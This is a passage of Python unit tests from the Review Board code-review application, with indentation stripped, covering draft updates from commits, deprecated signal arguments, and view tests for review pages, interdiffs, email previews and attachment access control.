commit = Commit(message='This is my commit message\n\n'
'With a summary line too.')
diff_filename = os.path.join(self.testdata_dir, 'git_readme.diff')
with open(diff_filename, 'r') as f:
commit.diff = f.read()
return commit
review_request = ReviewRequest.objects.create(self.user,
self.repository)
draft = ReviewRequestDraft.create(review_request)
self.spy_on(draft.repository.get_change, call_fake=get_change)
self.spy_on(draft.repository.get_file_exists)
draft.update_from_commit_id(commit_id)
self.assertFalse(draft.repository.get_file_exists.called)
self.assertEqual(review_request.summary, '')
self.assertEqual(review_request.description, '')
self.assertEqual(draft.summary, 'This is my commit message')
self.assertEqual(draft.description, 'With a summary line too.')
self.assertEqual(review_request.diffset_history.diffsets.count(), 0)
self.assertIsNotNone(draft.diffset)
self.assertEqual(draft.diffset.files.count(), 1)
filediff = draft.diffset.files.get()
self.assertEqual(filediff.source_file, 'readme')
self.assertEqual(filediff.source_revision, 'd6613f5')
def test_update_from_committed_change_with_rich_text_reset(self):
"""Testing ReviewRequestDraft.update_from_commit_id resets rich text
fields
"""
def get_change(repository, commit_to_get):
commit = Commit(
message='* This is a summary\n\n* This is a description.')
diff_filename = os.path.join(self.testdata_dir, 'git_readme.diff')
with open(diff_filename, 'r') as f:
commit.diff = f.read()
return commit
review_request = ReviewRequest.objects.create(self.user,
self.repository)
draft = ReviewRequestDraft.create(review_request)
self.spy_on(draft.repository.get_change, call_fake=get_change)
self.spy_on(draft.repository.get_file_exists)
draft.description_rich_text = True
draft.update_from_commit_id('4')
self.assertFalse(draft.repository.get_file_exists.called)
self.assertEqual(draft.summary, '* This is a summary')
self.assertEqual(draft.description, '* This is a description.')
self.assertFalse(draft.description_rich_text)
self.assertFalse(review_request.description_rich_text)
def test_update_from_pending_change_with_rich_text_reset(self):
"""Testing ReviewRequestDraft.update_from_pending_change resets rich
text fields
"""
review_request = ReviewRequest.objects.create(self.user,
self.repository)
draft = ReviewRequestDraft.create(review_request)
draft.description_rich_text = True
draft.testing_done_rich_text = True
changeset = ChangeSet()
changeset.changenum = 4
changeset.summary = '* This is a summary'
changeset.description = '* This is a description.'
changeset.testing_done = '* This is some testing.'
draft.update_from_pending_change(4, changeset)
self.assertEqual(draft.summary, '* This is a summary')
self.assertEqual(draft.description, '* This is a description.')
self.assertFalse(draft.description_rich_text)
self.assertEqual(draft.testing_done, '* This is some testing.')
self.assertFalse(draft.testing_done_rich_text)
def test_update_from_committed_change_without_repository_support(self):
"""Testing ReviewRequestDraft.update_from_commit_id without
supports_post_commmit for repository
"""
self.spy_on(self.repository.__class__.supports_post_commit.fget,
call_fake=lambda self: False)
review_request = ReviewRequest.objects.create(self.user,
self.repository)
draft = ReviewRequestDraft.create(review_request)
with self.assertRaises(NotImplementedError):
draft.update_from_commit_id('4')
```
#### File: reviews/tests/test_signals.py
```python
from __future__ import unicode_literals
from django.utils import six
from djblets.testing.decorators import add_fixtures
from kgb import SpyAgency
from reviewboard.reviews.models import ReviewRequest
from reviewboard.reviews.signals import (review_request_closed,
review_request_closing)
from reviewboard.testing import TestCase
class DeprecatedSignalArgsTests(SpyAgency, TestCase):
"""Tests for deprecated signal arguments."""
@add_fixtures(['test_users'])
def test_review_request_closed(self):
"""Testing review_request_closing signal has deprecated type argument
"""
def review_request_closed_cb(close_type, **kwargs):
self.assertIn('type', kwargs)
type_ = kwargs['type']
with self.assert_warns():
self.assertEqual(six.text_type(type_), close_type)
self.spy_on(review_request_closed_cb)
review_request_closed.connect(review_request_closed_cb,
sender=ReviewRequest)
review_request = self.create_review_request(publish=True)
try:
review_request.close(ReviewRequest.SUBMITTED)
finally:
review_request_closed.disconnect(review_request_closed_cb)
self.assertTrue(review_request_closed_cb.spy.called)
@add_fixtures(['test_users'])
def test_review_request_closing(self):
"""Testing review_request_closing signal has deprecated type argument
"""
def review_request_closing_cb(close_type, **kwargs):
self.assertIn('type', kwargs)
type_ = kwargs['type']
with self.assert_warns():
self.assertEqual(six.text_type(type_), close_type)
self.spy_on(review_request_closing_cb)
review_request_closing.connect(review_request_closing_cb,
sender=ReviewRequest)
review_request = self.create_review_request(publish=True)
try:
review_request.close(ReviewRequest.SUBMITTED)
finally:
review_request_closing.disconnect(review_request_closing_cb)
self.assertTrue(review_request_closing_cb.spy.called)
```
#### File: reviews/tests/test_views.py
```python
from __future__ import unicode_literals
from datetime import timedelta
from django.contrib.auth.models import User
from django.core.urlresolvers import reverse
from djblets.siteconfig.models import SiteConfiguration
from djblets.testing.decorators import add_fixtures
from reviewboard.extensions.tests import TestService
from reviewboard.hostingsvcs.service import (register_hosting_service,
unregister_hosting_service)
from reviewboard.hostingsvcs.models import HostingServiceAccount
from reviewboard.reviews.models import (Comment,
GeneralComment,
Review)
from reviewboard.site.urlresolvers import local_site_reverse
from reviewboard.testing import TestCase
class ViewTests(TestCase):
"""Tests for views in reviewboard.reviews.views."""
fixtures = ['test_users', 'test_scmtools', 'test_site']
def setUp(self):
super(ViewTests, self).setUp()
self.siteconfig = SiteConfiguration.objects.get_current()
self.siteconfig.set('auth_require_sitewide_login', False)
self.siteconfig.save()
def test_review_detail_redirect_no_slash(self):
"""Testing review_detail view redirecting with no trailing slash"""
response = self.client.get('/r/1')
self.assertEqual(response.status_code, 301)
def test_review_detail(self):
"""Testing review_detail view"""
review_request = self.create_review_request(publish=True)
response = self.client.get('/r/%d/' % review_request.id)
self.assertEqual(response.status_code, 200)
request = self._get_context_var(response, 'review_request')
self.assertEqual(request.pk, review_request.pk)
def test_review_detail_context(self):
"""Testing review_detail view's context"""
# Make sure this request is made while logged in, to catch the
# login-only pieces of the review_detail view.
self.client.login(username='admin', password='<PASSWORD>')
username = 'admin'
summary = 'This is a test summary'
description = 'This is my description'
testing_done = 'Some testing'
review_request = self.create_review_request(
publish=True,
submitter=username,
summary=summary,
description=description,
testing_done=testing_done)
response = self.client.get('/r/%s/' % review_request.pk)
self.assertEqual(response.status_code, 200)
request = self._get_context_var(response, 'review_request')
self.assertEqual(request.submitter.username, username)
self.assertEqual(request.summary, summary)
self.assertEqual(request.description, description)
self.assertEqual(request.testing_done, testing_done)
self.assertEqual(request.pk, review_request.pk)
def test_review_detail_diff_comment_ordering(self):
"""Testing review_detail and ordering of diff comments on a review"""
comment_text_1 = 'Comment text 1'
comment_text_2 = 'Comment text 2'
comment_text_3 = 'Comment text 3'
review_request = self.create_review_request(create_repository=True,
publish=True)
diffset = self.create_diffset(review_request)
filediff = self.create_filediff(diffset)
# Create the users who will be commenting.
user1 = User.objects.get(username='doc')
user2 = User.objects.get(username='dopey')
# Create the master review.
main_review = self.create_review(review_request, user=user1)
main_comment = self.create_diff_comment(main_review, filediff,
text=comment_text_1)
main_review.publish()
# First reply
reply1 = self.create_reply(
main_review,
user=user1,
timestamp=(main_review.timestamp + timedelta(days=1)))
self.create_diff_comment(reply1, filediff, text=comment_text_2,
reply_to=main_comment)
# Second reply
reply2 = self.create_reply(
main_review,
user=user2,
timestamp=(main_review.timestamp + timedelta(days=2)))
self.create_diff_comment(reply2, filediff, text=comment_text_3,
reply_to=main_comment)
# Publish them out of order.
reply2.publish()
reply1.publish()
# Make sure they published in the order expected.
self.assertTrue(reply1.timestamp > reply2.timestamp)
# Make sure they're looked up in the order expected.
comments = list(
Comment.objects
.filter(review__review_request=review_request)
.order_by('timestamp')
)
self.assertEqual(len(comments), 3)
self.assertEqual(comments[0].text, comment_text_1)
self.assertEqual(comments[1].text, comment_text_3)
self.assertEqual(comments[2].text, comment_text_2)
# Now figure out the order on the page.
response = self.client.get('/r/%d/' % review_request.pk)
self.assertEqual(response.status_code, 200)
entries = response.context['entries']
self.assertEqual(len(entries), 1)
entry = entries[0]
comments = entry.comments['diff_comments']
self.assertEqual(len(comments), 1)
self.assertEqual(comments[0].text, comment_text_1)
replies = comments[0].public_replies()
self.assertEqual(len(replies), 2)
self.assertEqual(replies[0].text, comment_text_3)
self.assertEqual(replies[1].text, comment_text_2)
def test_review_detail_general_comment_ordering(self):
"""Testing review_detail and ordering of general comments on a review
"""
comment_text_1 = 'Comment text 1'
comment_text_2 = 'Comment text 2'
comment_text_3 = 'Comment text 3'
review_request = self.create_review_request(create_repository=True,
publish=True)
# Create the users who will be commenting.
user1 = User.objects.get(username='doc')
user2 = User.objects.get(username='dopey')
# Create the master review.
main_review = self.create_review(review_request, user=user1)
main_comment = self.create_general_comment(main_review,
text=comment_text_1)
main_review.publish()
# First reply
reply1 = self.create_reply(
main_review,
user=user1,
timestamp=(main_review.timestamp + timedelta(days=1)))
self.create_general_comment(reply1, text=comment_text_2,
reply_to=main_comment)
# Second reply
reply2 = self.create_reply(
main_review,
user=user2,
timestamp=(main_review.timestamp + timedelta(days=2)))
self.create_general_comment(reply2, text=comment_text_3,
reply_to=main_comment)
# Publish them out of order.
reply2.publish()
reply1.publish()
# Make sure they published in the order expected.
self.assertTrue(reply1.timestamp > reply2.timestamp)
# Make sure they're looked up in the order expected.
comments = list(
GeneralComment.objects
.filter(review__review_request=review_request)
.order_by('timestamp')
)
self.assertEqual(len(comments), 3)
self.assertEqual(comments[0].text, comment_text_1)
self.assertEqual(comments[1].text, comment_text_3)
self.assertEqual(comments[2].text, comment_text_2)
def test_review_detail_file_attachment_visibility(self):
"""Testing visibility of file attachments on review requests"""
caption_1 = 'File Attachment 1'
caption_2 = 'File Attachment 2'
caption_3 = 'File Attachment 3'
comment_text_1 = 'Comment text 1'
comment_text_2 = 'Comment text 2'
user1 = User.objects.get(username='doc')
review_request = self.create_review_request()
# Add two file attachments. One active, one inactive.
file1 = self.create_file_attachment(review_request, caption=caption_1)
file2 = self.create_file_attachment(review_request, caption=caption_2,
active=False)
review_request.publish(user1)
# Create a third file attachment on a draft.
self.create_file_attachment(review_request, caption=caption_3,
draft=True)
# Create the review with comments for each screenshot.
review = Review.objects.create(review_request=review_request,
user=user1)
review.file_attachment_comments.create(file_attachment=file1,
text=comment_text_1)
review.file_attachment_comments.create(file_attachment=file2,
text=comment_text_2)
review.publish()
# Check that we can find all the objects we expect on the page.
self.client.login(username='doc', password='<PASSWORD>')
response = self.client.get('/r/%d/' % review_request.pk)
self.assertEqual(response.status_code, 200)
file_attachments = response.context['file_attachments']
self.assertEqual(len(file_attachments), 2)
self.assertEqual(file_attachments[0].caption, caption_1)
self.assertEqual(file_attachments[1].caption, caption_3)
# Make sure that other users won't see the draft one.
self.client.logout()
response = self.client.get('/r/%d/' % review_request.pk)
self.assertEqual(response.status_code, 200)
file_attachments = response.context['file_attachments']
self.assertEqual(len(file_attachments), 1)
self.assertEqual(file_attachments[0].caption, caption_1)
# Make sure we loaded the reviews and all data correctly.
entries = response.context['entries']
self.assertEqual(len(entries), 1)
entry = entries[0]
comments = entry.comments['file_attachment_comments']
self.assertEqual(len(comments), 2)
self.assertEqual(comments[0].text, comment_text_1)
self.assertEqual(comments[1].text, comment_text_2)
def test_review_detail_screenshot_visibility(self):
"""Testing visibility of screenshots on review requests"""
caption_1 = 'Screenshot 1'
caption_2 = 'Screenshot 2'
caption_3 = 'Screenshot 3'
comment_text_1 = 'Comment text 1'
comment_text_2 = 'Comment text 2'
user1 = User.objects.get(username='doc')
review_request = self.create_review_request()
# Add two screenshots. One active, one inactive.
screenshot1 = self.create_screenshot(review_request, caption=caption_1)
screenshot2 = self.create_screenshot(review_request, caption=caption_2,
active=False)
review_request.publish(user1)
# Add a third screenshot on a draft.
self.create_screenshot(review_request, caption=caption_3, draft=True)
# Create the review with comments for each screenshot.
user1 = User.objects.get(username='doc')
review = Review.objects.create(review_request=review_request,
user=user1)
review.screenshot_comments.create(screenshot=screenshot1,
text=comment_text_1,
x=10,
y=10,
w=20,
h=20)
review.screenshot_comments.create(screenshot=screenshot2,
text=comment_text_2,
x=0,
y=0,
w=10,
h=10)
review.publish()
# Check that we can find all the objects we expect on the page.
self.client.login(username='doc', password='<PASSWORD>')
response = self.client.get('/r/%d/' % review_request.pk)
self.assertEqual(response.status_code, 200)
screenshots = response.context['screenshots']
self.assertEqual(len(screenshots), 2)
self.assertEqual(screenshots[0].caption, caption_1)
self.assertEqual(screenshots[1].caption, caption_3)
# Make sure that other users won't see the draft one.
self.client.logout()
response = self.client.get('/r/%d/' % review_request.pk)
self.assertEqual(response.status_code, 200)
screenshots = response.context['screenshots']
self.assertEqual(len(screenshots), 1)
self.assertEqual(screenshots[0].caption, caption_1)
entries = response.context['entries']
self.assertEqual(len(entries), 1)
entry = entries[0]
# Make sure we loaded the reviews and all data correctly.
comments = entry.comments['screenshot_comments']
self.assertEqual(len(comments), 2)
self.assertEqual(comments[0].text, comment_text_1)
self.assertEqual(comments[1].text, comment_text_2)
def test_review_detail_sitewide_login(self):
"""Testing review_detail view with site-wide login enabled"""
self.siteconfig.set('auth_require_sitewide_login', True)
self.siteconfig.save()
self.create_review_request(publish=True)
response = self.client.get('/r/1/')
self.assertEqual(response.status_code, 302)
def test_new_review_request(self):
"""Testing new_review_request view"""
response = self.client.get('/r/new')
self.assertEqual(response.status_code, 301)
response = self.client.get('/r/new/')
self.assertEqual(response.status_code, 302)
self.client.login(username='grumpy', password='<PASSWORD>')
response = self.client.get('/r/new/')
self.assertEqual(response.status_code, 200)
# Bug 892
def test_interdiff(self):
"""Testing the diff viewer with interdiffs"""
review_request = self.create_review_request(create_repository=True,
publish=True)
diffset = self.create_diffset(review_request, revision=1)
self.create_filediff(
diffset,
source_file='/diffutils.py',
dest_file='/diffutils.py',
source_revision='6bba278',
dest_detail='465d217',
diff=(
b'diff --git a/diffutils.py b/diffutils.py\n'
b'index 6bba278..465d217 100644\n'
b'--- a/diffutils.py\n'
b'+++ b/diffutils.py\n'
b'@@ -1,3 +1,4 @@\n'
b'+# diffutils.py\n'
b' import fnmatch\n'
b' import os\n'
b' import re\n'
))
self.create_filediff(
diffset,
source_file='/readme',
dest_file='/readme',
source_revision='d6613f5',
dest_detail='5b50866',
diff=(
b'diff --git a/readme b/readme\n'
b'index d6613f5..5b50866 100644\n'
b'--- a/readme\n'
b'+++ b/readme\n'
b'@@ -1 +1,3 @@\n'
b' Hello there\n'
b'+\n'
b'+Oh hi!\n'
))
self.create_filediff(
diffset,
source_file='/newfile',
dest_file='/newfile',
source_revision='PRE-CREATION',
dest_detail='',
diff=(
b'diff --git a/new_file b/new_file\n'
b'new file mode 100644\n'
b'index 0000000..ac30bd3\n'
b'--- /dev/null\n'
b'+++ b/new_file\n'
b'@@ -0,0 +1 @@\n'
b'+This is a new file!\n'
))
diffset = self.create_diffset(review_request, revision=2)
self.create_filediff(
diffset,
source_file='/diffutils.py',
dest_file='/diffutils.py',
source_revision='6bba278',
dest_detail='465d217',
diff=(
b'diff --git a/diffutils.py b/diffutils.py\n'
b'index 6bba278..465d217 100644\n'
b'--- a/diffutils.py\n'
b'+++ b/diffutils.py\n'
b'@@ -1,3 +1,4 @@\n'
b'+# diffutils.py\n'
b' import fnmatch\n'
b' import os\n'
b' import re\n'
))
self.create_filediff(
diffset,
source_file='/readme',
dest_file='/readme',
source_revision='d6613f5',
dest_detail='5b50867',
diff=(
b'diff --git a/readme b/readme\n'
b'index d6613f5..5b50867 100644\n'
b'--- a/readme\n'
b'+++ b/readme\n'
b'@@ -1 +1,3 @@\n'
b' Hello there\n'
b'+----------\n'
b'+Oh hi!\n'
))
self.create_filediff(
diffset,
source_file='/newfile',
dest_file='/newfile',
source_revision='PRE-CREATION',
dest_detail='',
diff=(
b'diff --git a/new_file b/new_file\n'
b'new file mode 100644\n'
b'index 0000000..ac30bd4\n'
b'--- /dev/null\n'
b'+++ b/new_file\n'
b'@@ -0,0 +1 @@\n'
b'+This is a diffent version of this new file!\n'
))
response = self.client.get('/r/1/diff/1-2/')
# Useful for debugging any actual errors here.
if response.status_code != 200:
print('Error: %s' % self._get_context_var(response, 'error'))
print(self._get_context_var(response, 'trace'))
self.assertEqual(response.status_code, 200)
self.assertEqual(
self._get_context_var(response, 'diff_context')['num_diffs'],
2)
files = self._get_context_var(response, 'files')
self.assertTrue(files)
self.assertEqual(len(files), 2)
self.assertEqual(files[0]['depot_filename'], '/newfile')
self.assertIn('interfilediff', files[0])
self.assertEqual(files[1]['depot_filename'], '/readme')
self.assertIn('interfilediff', files[1])
# Bug 847
def test_interdiff_new_file(self):
"""Testing the diff viewer with interdiffs containing new files"""
review_request = self.create_review_request(create_repository=True,
publish=True)
diffset = self.create_diffset(review_request, revision=1)
self.create_filediff(
diffset,
source_file='/diffutils.py',
dest_file='/diffutils.py',
source_revision='6bba278',
dest_detail='465d217',
diff=(
b'diff --git a/diffutils.py b/diffutils.py\n'
b'index 6bba278..465d217 100644\n'
b'--- a/diffutils.py\n'
b'+++ b/diffutils.py\n'
b'@@ -1,3 +1,4 @@\n'
b'+# diffutils.py\n'
b' import fnmatch\n'
b' import os\n'
b' import re\n'
))
diffset = self.create_diffset(review_request, revision=2)
self.create_filediff(
diffset,
source_file='/diffutils.py',
dest_file='/diffutils.py',
source_revision='6bba278',
dest_detail='465d217',
diff=(
b'diff --git a/diffutils.py b/diffutils.py\n'
b'index 6bba278..465d217 100644\n'
b'--- a/diffutils.py\n'
b'+++ b/diffutils.py\n'
b'@@ -1,3 +1,4 @@\n'
b'+# diffutils.py\n'
b' import fnmatch\n'
b' import os\n'
b' import re\n'
))
self.create_filediff(
diffset,
source_file='/newfile',
dest_file='/newfile',
source_revision='PRE-CREATION',
dest_detail='',
diff=(
b'diff --git a/new_file b/new_file\n'
b'new file mode 100644\n'
b'index 0000000..ac30bd4\n'
b'--- /dev/null\n'
b'+++ b/new_file\n'
b'@@ -0,0 +1 @@\n'
b'+This is a diffent version of this new file!\n'
))
response = self.client.get('/r/1/diff/1-2/')
# Useful for debugging any actual errors here.
if response.status_code != 200:
print('Error: %s' % self._get_context_var(response, 'error'))
print(self._get_context_var(response, 'trace'))
self.assertEqual(response.status_code, 200)
self.assertEqual(
self._get_context_var(response, 'diff_context')['num_diffs'],
2)
files = self._get_context_var(response, 'files')
self.assertTrue(files)
self.assertEqual(len(files), 1)
self.assertEqual(files[0]['depot_filename'], '/newfile')
self.assertIn('interfilediff', files[0])
def test_review_request_etag_with_issues(self):
"""Testing review request ETags with issue status toggling"""
self.client.login(username='doc', password='<PASSWORD>')
# Some objects we need.
user = User.objects.get(username='doc')
review_request = self.create_review_request(create_repository=True,
publish=True)
diffset = self.create_diffset(review_request)
filediff = self.create_filediff(diffset)
# Create a review.
review = self.create_review(review_request, user=user)
comment = self.create_diff_comment(review, filediff,
issue_opened=True)
review.publish()
# Get the etag
response = self.client.get(review_request.get_absolute_url())
self.assertEqual(response.status_code, 200)
etag1 = response['ETag']
self.assertNotEqual(etag1, '')
# Change the issue status
comment.issue_status = Comment.RESOLVED
comment.save()
# Check the etag again
response = self.client.get(review_request.get_absolute_url())
self.assertEqual(response.status_code, 200)
etag2 = response['ETag']
self.assertNotEqual(etag2, '')
# Make sure they're not equal
self.assertNotEqual(etag1, etag2)
# Bug #3384
def test_diff_raw_content_disposition_attachment(self):
"""Testing /diff/raw/ Content-Disposition: attachment; ..."""
review_request = self.create_review_request(create_repository=True,
publish=True)
self.create_diffset(review_request=review_request)
response = self.client.get('/r/%d/diff/raw/' % review_request.pk)
self.assertEqual(response.status_code, 200)
self.assertEqual(response['Content-Disposition'],
'attachment; filename=diffset')
# Bug #3704
def test_diff_raw_multiple_content_disposition(self):
"""Testing /diff/raw/ multiple Content-Disposition issue"""
review_request = self.create_review_request(create_repository=True,
publish=True)
# Create a diffset with a comma in its name.
self.create_diffset(review_request=review_request, name='test, comma')
response = self.client.get('/r/%d/diff/raw/' % review_request.pk)
content_disposition = response['Content-Disposition']
filename = content_disposition[len('attachment; filename='):]
self.assertFalse(',' in filename)
# Bug #4080
def test_bug_url_with_custom_scheme(self):
"""Testing whether bug url with non-HTTP scheme loads correctly"""
# Create a repository with a bug tracker that uses a non-standard
# url scheme.
repository = self.create_repository(public=True,
bug_tracker='scheme://bugid=%s')
review_request = self.create_review_request(repository=repository,
publish=True)
url = reverse('bug_url', args=(review_request.pk, '1'))
response = self.client.get(url)
# Test if we redirected to the correct url with correct bugID.
self.assertEqual(response['Location'], 'scheme://bugid=1')
def test_preview_review_request_email_access_with_debug(self):
"""Testing preview_review_request_email access with DEBUG=True"""
review_request = self.create_review_request(publish=True)
with self.settings(DEBUG=True):
response = self.client.get(
local_site_reverse(
'preview-review-request-email',
kwargs={
'review_request_id': review_request.pk,
'message_format': 'text',
}))
self.assertEqual(response.status_code, 200)
def test_preview_review_request_email_access_without_debug(self):
"""Testing preview_review_request_email access with DEBUG=False"""
review_request = self.create_review_request(publish=True)
with self.settings(DEBUG=False):
response = self.client.get(
local_site_reverse(
'preview-review-request-email',
kwargs={
'review_request_id': review_request.pk,
'message_format': 'text',
}))
self.assertEqual(response.status_code, 404)
def test_preview_review_request_email_with_valid_change_id(self):
"""Testing preview_review_request_email access with valid change ID"""
review_request = self.create_review_request(create_repository=True,
publish=True)
self.create_diffset(review_request, draft=True)
review_request.publish(review_request.submitter)
with self.settings(DEBUG=True):
response = self.client.get(
local_site_reverse(
'preview-review-request-email',
kwargs={
'review_request_id': review_request.pk,
'message_format': 'text',
'changedesc_id': review_request.changedescs.get().pk,
}))
self.assertEqual(response.status_code, 200)
def test_preview_review_request_email_with_invalid_change_id(self):
"""Testing preview_review_request_email access with invalid change ID
"""
review_request = self.create_review_request(create_repository=True,
publish=True)
self.create_diffset(review_request, draft=True)
review_request.publish(review_request.submitter)
with self.settings(DEBUG=True):
response = self.client.get(
local_site_reverse(
'preview-review-request-email',
kwargs={
'review_request_id': review_request.pk,
'message_format': 'text',
'changedesc_id': 100,
}))
self.assertEqual(response.status_code, 404)
def test_preview_review_email_access_with_debug(self):
"""Testing preview_review_email access with DEBUG=True"""
review_request = self.create_review_request(publish=True)
review = self.create_review(review_request, publish=True)
with self.settings(DEBUG=True):
response = self.client.get(
local_site_reverse(
'preview-review-email',
kwargs={
'review_request_id': review_request.pk,
'review_id': review.pk,
'message_format': 'text',
}))
self.assertEqual(response.status_code, 200)
def test_preview_review_email_access_without_debug(self):
"""Testing preview_review_email access with DEBUG=False"""
review_request = self.create_review_request(publish=True)
review = self.create_review(review_request, publish=True)
with self.settings(DEBUG=False):
response = self.client.get(
local_site_reverse(
'preview-review-email',
kwargs={
'review_request_id': review_request.pk,
'review_id': review.pk,
'message_format': 'text',
}))
self.assertEqual(response.status_code, 404)
def test_preview_review_reply_email_access_with_debug(self):
"""Testing preview_review_reply_email access with DEBUG=True"""
review_request = self.create_review_request(publish=True)
review = self.create_review(review_request, publish=True)
reply = self.create_reply(review, publish=True)
with self.settings(DEBUG=True):
response = self.client.get(
local_site_reverse(
'preview-review-reply-email',
kwargs={
'review_request_id': review_request.pk,
'review_id': review.pk,
'reply_id': reply.pk,
'message_format': 'text',
}))
self.assertEqual(response.status_code, 200)
def test_preview_review_reply_email_access_without_debug(self):
"""Testing preview_review_reply_email access with DEBUG=False"""
review_request = self.create_review_request(publish=True)
review = self.create_review(review_request, publish=True)
reply = self.create_reply(review, publish=True)
with self.settings(DEBUG=False):
response = self.client.get(
local_site_reverse(
'preview-review-reply-email',
kwargs={
'review_request_id': review_request.pk,
'review_id': review.pk,
'reply_id': reply.pk,
'message_format': 'text',
}))
self.assertEqual(response.status_code, 404)
def test_view_screenshot_access_with_valid_id(self):
"""Testing view_screenshot access with valid screenshot for review
request
"""
review_request = self.create_review_request(publish=True)
screenshot = self.create_screenshot(review_request)
response = self.client.get(
local_site_reverse(
'screenshot',
kwargs={
'review_request_id': review_request.pk,
'screenshot_id': screenshot.pk,
}))
self.assertEqual(response.status_code, 200)
def test_view_screenshot_access_with_valid_id_and_draft(self):
"""Testing view_screenshot access with valid screenshot for review
request draft
"""
review_request = self.create_review_request(publish=True)
screenshot = self.create_screenshot(review_request, draft=True)
# Log in so that we can check against the draft.
username = review_request.submitter.username
self.client.login(username=username, password=<PASSWORD>)
response = self.client.get(
local_site_reverse(
'screenshot',
kwargs={
'review_request_id': review_request.pk,
'screenshot_id': screenshot.pk,
}))
self.assertEqual(response.status_code, 200)
def test_view_screenshot_access_with_valid_inactive_id(self):
"""Testing view_screenshot access with valid inactive screenshot for
review request
"""
review_request = self.create_review_request(publish=True)
screenshot = self.create_screenshot(review_request, active=False)
response = self.client.get(
local_site_reverse(
'screenshot',
kwargs={
'review_request_id': review_request.pk,
'screenshot_id': screenshot.pk,
}))
self.assertEqual(response.status_code, 200)
def test_view_screenshot_access_with_valid_inactive_id_and_draft(self):
"""Testing view_screenshot access with valid inactive screenshot for
review request draft
"""
review_request = self.create_review_request(publish=True)
screenshot = self.create_screenshot(review_request, draft=True,
active=False)
# Log in so that we can check against the draft.
username = review_request.submitter.username
self.client.login(username=username, password=<PASSWORD>)
response = self.client.get(
local_site_reverse(
'screenshot',
kwargs={
'review_request_id': review_request.pk,
'screenshot_id': screenshot.pk,
}))
self.assertEqual(response.status_code, 200)
def test_view_screenshot_access_with_invalid_id(self):
"""Testing view_screenshot access with invalid screenshot for review
request
"""
review_request = self.create_review_request(publish=True)
screenshot = self.create_screenshot(review_request)
review_request2 = self.create_review_request(publish=True)
response = self.client.get(
local_site_reverse(
'screenshot',
kwargs={
'review_request_id': review_request2.pk,
'screenshot_id': screenshot.pk,
}))
self.assertEqual(response.status_code, 404)
def test_view_screenshot_access_with_invalid_id_and_draft(self):
"""Testing view_screenshot access with invalid screenshot for review
request draft
"""
review_request = self.create_review_request(publish=True)
screenshot = self.create_screenshot(review_request, draft=True)
review_request2 = self.create_review_request(publish=True)
# Log in so that we can check against the draft.
username = review_request.submitter.username
self.client.login(username=username, password=<PASSWORD>)
response = self.client.get(
local_site_reverse(
'screenshot',
kwargs={
'review_request_id': review_request2.pk,
'screenshot_id': screenshot.pk,
}))
self.assertEqual(response.status_code, 404)
def test_view_screenshot_access_with_invalid_inactive_id(self):
"""Testing view_screenshot access with invalid inactive screenshot
for review request
"""
review_request = self.create_review_request(publish=True)
screenshot = self.create_screenshot(review_request, active=False)
review_request2 = self.create_review_request(publish=True)
response = self.client.get(
local_site_reverse(
'screenshot',
kwargs={
'review_request_id': review_request2.pk,
'screenshot_id': screenshot.pk,
}))
self.assertEqual(response.status_code, 404)
def test_view_screenshot_access_with_invalid_inactive_id_and_draft(self):
"""Testing view_screenshot access with invalid inactive screenshot
for review request draft
"""
review_request = self.create_review_request(publish=True)
screenshot = self.create_screenshot(review_request, draft=True,
active=False)
review_request2 = self.create_review_request(publish=True)
# Log in so that we can check against the draft.
username = review_request.submitter.username
self.client.login(username=username, password=<PASSWORD>)
response = self.client.get(
local_site_reverse(
'screenshot',
kwargs={
'review_request_id': review_request2.pk,
'screenshot_id': screenshot.pk,
}))
self.assertEqual(response.status_code, 404)
def test_review_file_attachment_access_with_valid_id(self):
"""Testing review_file_attachment access with valid attachment for
review request
"""
review_request = self.create_review_request(publish=True)
attachment = self.create_file_attachment(review_request)
response = self.client.get(
local_site_reverse(
'file-attachment',
kwargs={
'review_request_id': review_request.pk,
'file_attachment_id': attachment.pk,
}))
self.assertEqual(response.status_code, 200)
def test_review_file_attachment_access_with_valid_id_and_draft(self):
"""Testing review_file_attachment access with valid attachment for
review request draft
"""
review_request = self.create_review_request(publish=True)
attachment = self.create_file_attachment(review_request, draft=True)
# Log in so that we can check against the draft.
username = review_request.submitter.username
self.client.login(username=username, password=<PASSWORD>)
response = self.client.get(
local_site_reverse(
'file-attachment',
kwargs={
'review_request_id': review_request.pk,
'file_attachment_id': attachment.pk,
}))
self.assertEqual(response.status_code, 200)
def test_review_file_attachment_access_with_invalid_id(self):
"""Testing review_file_attachment access with invalid attachment for
review request
"""
review_request = self.create_review_request(publish=True)
attachment = self.create_file_attachment(review_request)
review_request2 = self.create_review_request(publish=True)
response = self.client.get(
local_site_reverse(
'file-attachment',
kwargs={
'review_request_id': review_request2.pk,
'file_attachment_id': attachment.pk,
}))
self.assertEqual(response.status_code, 404)
def test_review_file_attachment_access_with_invalid_id_and_draft(self):
"""Testing review_file_attachment access with invalid attachment for
review request draft
"""
review_request = self.create_review_request(publish=True)
attachment = self.create_file_attachment(review_request, draft=True)
review_request2 = self.create_review_request(publish=True)
# Log in so that we can check against the draft.
username = review_request.submitter.username
self.client.login(username=username, password=<PASSWORD>)
response = self.client.get(
local_site_reverse(
'file-attachment',
kwargs={
'review_request_id': review_request2.pk,
'file_attachment_id': attachment.pk,
}))
self.assertEqual(response.status_code, 404)
def test_review_file_attachment_access_with_valid_inactive_id(self):
"""Testing review_file_attachment access with valid inactive
attachment for review request
"""
review_request = self.create_review_request(publish=True)
attachment = self.create_file_attachment(review_request, active=False)
response = self.client.get(
local_site_reverse(
'file-attachment',
kwargs={
'review_request_id': review_request.pk,
'file_attachment_id': attachment.pk,
}))
self.assertEqual(response.status_code, 200)
def test_review_file_attachment_access_with_valid_inactive_id_draft(self):
"""Testing review_file_attachment access with valid inactive
attachment for review request draft
"""
review_request = self.create_review_request(publish=True)
attachment = self.create_file_attachment(review_request, draft=True,
active=False)
# Log in so that we can check against the draft.
username = review_request.submitter.username
self.client.login(username=username, password=<PASSWORD>)
response = self.client.get(
local_site_reverse(
'file-attachment',
kwargs={
'review_request_id': review_request.pk,
'file_attachment_id': attachment.pk,
}))
self.assertEqual(response.status_code, 200)
def test_review_file_attachment_access_with_invalid_inactive_id(self):
"""Testing review_file_attachment access with invalid inactive
attachment for review request
"""
review_request = self.create_review_request(publish=True)
attachment = self.create_file_attachment(review_request, active=False)
review_request2 = self.create_review_request(publish=True)
response = self.client.get(
local_site_reverse(
'file-attachment',
kwargs={
'review_request_id': review_request2.pk,
'file_attachment_id': attachment.pk,
}))
self.assertEqual(response.status_code, 404)
def test_review_file_attachment_access_invalid_inactive_id_draft(self):
"""Testing review_file_attachment access with invalid inactive
